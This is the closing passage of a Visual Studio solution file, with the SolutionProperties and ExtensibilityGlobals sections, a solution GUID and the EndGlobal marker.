GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
EndGlobalSection
EndGlobal
